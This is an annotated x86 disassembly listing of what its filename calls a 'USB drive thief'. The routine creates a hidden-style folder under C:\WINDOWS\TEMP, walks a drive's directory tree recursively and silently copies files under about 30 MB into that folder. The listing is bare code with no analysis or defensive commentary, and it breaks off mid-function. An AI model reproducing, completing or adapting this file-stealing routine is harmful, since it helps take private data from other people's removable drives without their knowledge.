📄 u盘小偷汇编版.txt
::00401000:: 55 PUSH EBP \:BYCALL CallBy:004011D1,004012CD,
::00401001:: 8BEC MOV EBP,ESP
::00401003:: 81C4 A8F9FFFF ADD ESP,-658
::00401009:: 68 04010000 PUSH 104
::0040100E:: 8D85 BAFDFFFF LEA EAX,[EBP-246]
::00401014:: 50 PUSH EAX
::00401015:: E8 26030000 CALL 00401340 \:JMPDOWN >>>: KERNEL32.DLL:RtlZeroMemory
::0040101A:: 68 04010000 PUSH 104
::0040101F:: 8D85 B6FCFFFF LEA EAX,[EBP-34A]
::00401025:: 50 PUSH EAX
::00401026:: E8 15030000 CALL 00401340 \:JMPDOWN >>>: KERNEL32.DLL:RtlZeroMemory
::0040102B:: 68 04010000 PUSH 104
::00401030:: 8D85 B2FBFFFF LEA EAX,[EBP-44E]
::00401036:: 50 PUSH EAX
::00401037:: E8 04030000 CALL 00401340 \:JMPDOWN >>>: KERNEL32.DLL:RtlZeroMemory
::0040103C:: 68 04010000 PUSH 104
::00401041:: 8D85 AEFAFFFF LEA EAX,[EBP-552]
::00401047:: 50 PUSH EAX
::00401048:: E8 F3020000 CALL 00401340 \:JMPDOWN >>>: KERNEL32.DLL:RtlZeroMemory
::0040104D:: 68 04010000 PUSH 104
::00401052:: 8D85 AAF9FFFF LEA EAX,[EBP-656]
::00401058:: 50 PUSH EAX
::00401059:: E8 E2020000 CALL 00401340 \:JMPDOWN >>>: KERNEL32.DLL:RtlZeroMemory
::0040105E:: 60 PUSHAD
::0040105F:: FF75 08 PUSH DWORD PTR [EBP+8]
::00401062:: 8D85 BAFDFFFF LEA EAX,[EBP-246]
::00401068:: 50 PUSH EAX
::00401069:: E8 E4020000 CALL 00401352 \:JMPDOWN >>>: KERNEL32.DLL:copy string
::0040106E:: 8D85 BAFDFFFF LEA EAX,[EBP-246]
::00401074:: 50 PUSH EAX
::00401075:: E8 DE020000 CALL 00401358 \:JMPDOWN >>>: KERNEL32.DLL:get string length
::0040107A:: 8DB5 BAFDFFFF LEA ESI,[EBP-246]
::00401080:: 33C9 XOR ECX,ECX
::00401082:: B1 5C MOV CL,5C
::00401084:: 384C30 FF CMP [EAX+ESI-1],CL
::00401088:: 74 04 JE SHORT 0040108E \:JMPDOWN
::0040108A:: 66:890C30 MOV [EAX+ESI],CX
::0040108E:: 8D85 BAFDFFFF LEA EAX,[EBP-246] \:BYJMP JmpBy:00401088,
::00401094:: 50 PUSH EAX
::00401095:: 8D85 B2FBFFFF LEA EAX,[EBP-44E]
::0040109B:: 50 PUSH EAX
::0040109C:: E8 B1020000 CALL 00401352 \:JMPDOWN >>>: KERNEL32.DLL:copy string
::004010A1:: 68 40204000 PUSH 402040 \->: *.*
::004010A6:: 8D85 B2FBFFFF LEA EAX,[EBP-44E]
::004010AC:: 50 PUSH EAX
::004010AD:: E8 9A020000 CALL 0040134C \:JMPDOWN >>>: KERNEL32.DLL:concatenate string
::004010B2:: 68 48204000 PUSH 402048 \->: C:\WINDOWS\TEMP\Heicai\
::004010B7:: 8D85 B6FCFFFF LEA EAX,[EBP-34A]
::004010BD:: 50 PUSH EAX
::004010BE:: E8 8F020000 CALL 00401352 \:JMPDOWN >>>: KERNEL32.DLL:copy string
::004010C3:: 8D85 BDFDFFFF LEA EAX,[EBP-243]
::004010C9:: 50 PUSH EAX
::004010CA:: 8D85 B6FCFFFF LEA EAX,[EBP-34A]
::004010D0:: 50 PUSH EAX
::004010D1:: E8 76020000 CALL 0040134C \:JMPDOWN >>>: KERNEL32.DLL:concatenate string
::004010D6:: 8D85 B6FCFFFF LEA EAX,[EBP-34A]
::004010DC:: 6A 00 PUSH 0
::004010DE:: 8D85 B6FCFFFF LEA EAX,[EBP-34A]
::004010E4:: 50 PUSH EAX
::004010E5:: E8 26020000 CALL 00401310 \:JMPDOWN >>>: KERNEL32.DLL:CreateDirectoryA
::004010EA:: 8D85 BEFEFFFF LEA EAX,[EBP-142]
::004010F0:: 50 PUSH EAX
::004010F1:: 8D85 B2FBFFFF LEA EAX,[EBP-44E]
::004010F7:: 50 PUSH EAX
::004010F8:: E8 2B020000 CALL 00401328 \:JMPDOWN >>>: KERNEL32.DLL:FindFirstFileA
::004010FD:: 83F8 FF CMP EAX,-1
::00401100:: 0F84 81010000 JE 00401287 \:JMPDOWN
::00401106:: 8945 FC MOV [EBP-4],EAX
::00401109:: 8D85 BAFDFFFF LEA EAX,[EBP-246] \:BYJMP JmpBy:00401279,
::0040110F:: 50 PUSH EAX
::00401110:: 8D85 AEFAFFFF LEA EAX,[EBP-552]
::00401116:: 50 PUSH EAX
::00401117:: E8 36020000 CALL 00401352 \:JMPDOWN >>>: KERNEL32.DLL:copy string
::0040111C:: 8D85 EAFEFFFF LEA EAX,[EBP-116]
::00401122:: 50 PUSH EAX
::00401123:: 8D85 AEFAFFFF LEA EAX,[EBP-552]
::00401129:: 50 PUSH EAX
::0040112A:: E8 1D020000 CALL 0040134C \:JMPDOWN >>>: KERNEL32.DLL:concatenate string
::0040112F:: 8D85 B6FCFFFF LEA EAX,[EBP-34A]
::00401135:: 50 PUSH EAX
::00401136:: 8D85 AAF9FFFF LEA EAX,[EBP-656]
::0040113C:: 50 PUSH EAX
::0040113D:: E8 10020000 CALL 00401352 \:JMPDOWN >>>: KERNEL32.DLL:copy string
::00401142:: 8D85 EAFEFFFF LEA EAX,[EBP-116]
::00401148:: 50 PUSH EAX
::00401149:: 8D85 AAF9FFFF LEA EAX,[EBP-656]
::0040114F:: 50 PUSH EAX
::00401150:: E8 F7010000 CALL 0040134C \:JMPDOWN >>>: KERNEL32.DLL:concatenate string
::00401155:: 6A 00 PUSH 0
::00401157:: 68 00000002 PUSH 2000000
::0040115C:: 6A 03 PUSH 3
::0040115E:: 6A 00 PUSH 0
::00401160:: 6A 01 PUSH 1
::00401162:: 68 00000080 PUSH 80000000
::00401167:: 8D85 AAF9FFFF LEA EAX,[EBP-656]
::0040116D:: 50 PUSH EAX
::0040116E:: E8 A3010000 CALL 00401316 \:JMPDOWN >>>: KERNEL32.DLL:favorite one to see when cracking
::00401173:: 83F8 FF CMP EAX,-1
::00401176:: 75 04 JNZ SHORT 0040117C \:JMPDOWN
::00401178:: EB 29 JMP SHORT 004011A3 \:JMPDOWN
::0040117A:: EB 27 JMP SHORT 004011A3 \:JMPDOWN
::0040117C:: A3 14304000 MOV [403014],EAX \:BYJMP JmpBy:00401176,
::00401181:: B8 00000000 MOV EAX,0
::00401186:: 6A 00 PUSH 0
::00401188:: FF35 14304000 PUSH DWORD PTR [403014]
::0040118E:: E8 A7010000 CALL 0040133A \:JMPDOWN >>>: KERNEL32.DLL:get file length
::00401193:: A3 10304000 MOV [403010],EAX
::00401198:: FF35 14304000 PUSH DWORD PTR [403014]
::0040119E:: E8 61010000 CALL 00401304 \:JMPDOWN >>>: KERNEL32.DLL:close handle
::004011A3:: F785 BEFEFFFF 10000000 TEST DWORD PTR [EBP-142],10 \:BYJMP JmpBy:00401178,0040117A,
::004011AD:: 74 2C JE SHORT 004011DB \:JMPDOWN
::004011AF:: 80BD EAFEFFFF 2E CMP BYTE PTR [EBP-116],2E
::004011B6:: 0F84 AC000000 JE 00401268 \:JMPDOWN
::004011BC:: 6A 00 PUSH 0
::004011BE:: 8D85 AAF9FFFF LEA EAX,[EBP-656]
::004011C4:: 50 PUSH EAX
::004011C5:: E8 46010000 CALL 00401310 \:JMPDOWN >>>: KERNEL32.DLL:CreateDirectoryA
::004011CA:: 8D85 AEFAFFFF LEA EAX,[EBP-552]
::004011D0:: 50 PUSH EAX
::004011D1:: E8 2AFEFFFF CALL 00401000 \:JMPUP
::004011D6:: E9 8D000000 JMP 00401268 \:JMPDOWN
::004011DB:: 6A 00 PUSH 0 \:BYJMP JmpBy:004011AD,
::004011DD:: 6A 20 PUSH 20
::004011DF:: 6A 03 PUSH 3
::004011E1:: 6A 00 PUSH 0
::004011E3:: 6A 03 PUSH 3
::004011E5:: 68 00000080 PUSH 80000000
::004011EA:: 8D85 AEFAFFFF LEA EAX,[EBP-552]
::004011F0:: 50 PUSH EAX
::004011F1:: E8 20010000 CALL 00401316 \:JMPDOWN >>>: KERNEL32.DLL:favorite one to see when cracking
::004011F6:: 83F8 FF CMP EAX,-1
::004011F9:: 74 6D JE SHORT 00401268 \:JMPDOWN
::004011FB:: A3 08304000 MOV [403008],EAX
::00401200:: B8 00000000 MOV EAX,0
::00401205:: 6A 00 PUSH 0
::00401207:: FF35 08304000 PUSH DWORD PTR [403008]
::0040120D:: E8 28010000 CALL 0040133A \:JMPDOWN >>>: KERNEL32.DLL:get file length
::00401212:: A3 0C304000 MOV [40300C],EAX
::00401217:: 3D 0000E001 CMP EAX,1E00000
::0040121C:: 73 2A JNB SHORT 00401248 \:JMPDOWN
::0040121E:: 3B05 10304000 CMP EAX,[403010]
::00401224:: 75 22 JNZ SHORT 00401248 \:JMPDOWN
::00401226:: FF35 08304000 PUSH DWORD PTR [403008]
::0040122C:: E8 D3000000 CALL 00401304 \:JMPDOWN >>>: KERNEL32.DLL:close handle
::00401231:: 6A 01 PUSH 1
::00401233:: 8D85 AAF9FFFF LEA EAX,[EBP-656]
::00401239:: 50 PUSH EAX
::0040123A:: 8D85 AEFAFFFF LEA EAX,[EBP-552]
::00401240:: 50 PUSH EAX
::00401241:: E8 C4000000 CALL 0040130A \:JMPDOWN >>>: KERNEL32.DLL:CopyFileA
::00401246:: EB 20 JMP SHORT 00401268 \:JMPDOWN
::00401248:: FF35 08304000 PUSH DWORD PTR [403008] \:BYJMP JmpBy:0040121C,00401224,
::0040124E:: E8 B1000000 CALL 00401304 \:JMPDOWN >>>: KERNEL32.DLL:close handle